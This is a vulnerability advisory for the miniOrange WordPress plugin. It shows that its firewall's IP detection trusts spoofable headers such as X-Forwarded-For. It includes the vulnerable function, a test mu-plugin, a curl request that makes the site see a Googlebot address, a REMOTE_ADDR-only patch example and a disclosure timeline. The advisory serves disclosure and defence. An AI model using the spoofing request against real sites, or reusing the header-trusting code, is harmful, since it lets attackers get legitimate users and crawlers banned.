| Affected plugin | miniOrange |
| Active installs | 20,000+ |
| Vulnerable version | <= 5.5.82 |
| Audited version | 5.5.82 |
| Fully patched version | – |
| Recommended remediation | Removal of the plugin |
Description
The plugin is wide open to IP spoofing across the board, which an attacker can exploit to permanently ban search-engine crawlers, legitimate users, or the site’s reverse proxy.
Proof of concept
In more than two dozen places, the plugin uses the current IP address in a security-related context. In every case, IP detection is vulnerable to spoofing because HTTP headers are blindly trusted to contain truthful information.
One of the most prominent places is the included Web Application Firewall (WAF).
The WAF determines the IP address using the get_ipaddress function:
function get_ipaddress()
{
    $ipaddress = '';
    if (isset($_SERVER['HTTP_CLIENT_IP']) && mo2f_isValidIP($_SERVER['HTTP_CLIENT_IP']))
        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
    elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && mo2f_isValidIP($_SERVER['HTTP_X_FORWARDED_FOR']))
        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
    elseif (isset($_SERVER['HTTP_X_FORWARDED']) && mo2f_isValidIP($_SERVER['HTTP_X_FORWARDED']))
        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
    elseif (isset($_SERVER['HTTP_FORWARDED_FOR']) && mo2f_isValidIP($_SERVER['HTTP_FORWARDED_FOR']))
    {
        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
        $ipaddress = explode(",", $ipaddress)[0];
    }
    elseif (isset($_SERVER['HTTP_FORWARDED']) && mo2f_isValidIP($_SERVER['HTTP_FORWARDED']))
        $ipaddress = $_SERVER['HTTP_FORWARDED'];
    elseif (isset($_SERVER['REMOTE_ADDR']) && mo2f_isValidIP($_SERVER['REMOTE_ADDR']))
        $ipaddress = $_SERVER['REMOTE_ADDR'];
    else
        $ipaddress = 'UNKNOWN';
    return $ipaddress;
}
This function blindly trusts the value of several client-controlled HTTP headers and consults REMOTE_ADDR, the only value the web server derives from the actual connection, as a last resort.
Create the following mu-plugin to verify the exploit:
<?php
declare(strict_types=1);
// wp-content/mu-plugins/ip.php

// Simulate the real connecting address so the result can be compared against it.
$real_ip = '220.205.191.38';
$_SERVER['REMOTE_ADDR'] = $real_ip;

// Only react to requests carrying the Test-IP header, so normal traffic is unaffected.
if (!isset($_SERVER['HTTP_TEST_IP'])) {
    return;
}

// Once the plugin is loaded, print what its WAF believes the client IP to be.
add_action('wp_loaded', function () {
    echo get_ipaddress();
    echo "\n";
    die();
});
Then run:
curl -X GET https://local.test -H "Test-IP: 1" -H "X-Forwarded-For: 66.249.66.67"
Output: 66.249.66.67. The plugin now thinks the attacker is Googlebot.
Proposed patch
The needed patch is described at great length in this article of ours.
Summary: Only ever use REMOTE_ADDR to determine the current IP.
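The following is an added example of what such a patch looks like; it is not the plugin's code, and the function name mo2f_remote_ip and the sample request array are hypothetical. It reads only REMOTE_ADDR, which the web server fills in from the TCP connection and which request headers cannot influence, and it demonstrates that the same spoofed headers used in the proof of concept above no longer change the result.

```php
<?php
declare(strict_types=1);

// Added example, not the plugin's code. Sites behind a reverse proxy should restore the
// client address into REMOTE_ADDR at the web-server layer (e.g. nginx's
// ngx_http_realip_module or Apache's mod_remoteip) rather than parsing headers in PHP.

/**
 * Returns the connecting client's IP address, or null if it is absent or not a
 * syntactically valid IPv4/IPv6 literal. Only REMOTE_ADDR is consulted; every
 * HTTP_* entry in $server is ignored on purpose. (Hypothetical name.)
 */
function mo2f_remote_ip(array $server): ?string
{
    $ip = $server['REMOTE_ADDR'] ?? null;
    if (!is_string($ip)) {
        return null;
    }
    // filter_var rejects anything that is not a single well-formed IP literal,
    // including comma-separated lists such as "1.2.3.4, 5.6.7.8".
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    return $ip;
}

// Constructed request: the connection really comes from 220.205.191.38 while the
// client also sends every header the vulnerable get_ipaddress() trusted.
$spoofed_request = [
    'REMOTE_ADDR'          => '220.205.191.38',
    'HTTP_CLIENT_IP'       => '66.249.66.67',
    'HTTP_X_FORWARDED_FOR' => '66.249.66.67',
    'HTTP_X_FORWARDED'     => '66.249.66.67',
    'HTTP_FORWARDED_FOR'   => '66.249.66.67',
    'HTTP_FORWARDED'       => '66.249.66.67',
];

$ip = mo2f_remote_ip($spoofed_request);
assert($ip === '220.205.191.38');
echo "Detected IP: {$ip}\n";

// No connection address at all (e.g. a CLI run) yields null, so callers must treat
// "no IP" as a distinct state instead of an empty string or the literal 'UNKNOWN'.
assert(mo2f_remote_ip([]) === null);
// A header-style list in REMOTE_ADDR is rejected rather than split on the first comma.
assert(mo2f_remote_ip(['REMOTE_ADDR' => '66.249.66.67, 1.2.3.4']) === null);
```

Returning null instead of a sentinel string matters for the ban logic: a caller that blocks or allows "UNKNOWN" as if it were an address would otherwise treat every request without a resolvable IP identically.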
Timeline
| Vendor contacted | September 12, 2022 |
| First response | September 16, 2022 |
| Fully patched at | – |
| Publicly disclosed | April 24, 2023 |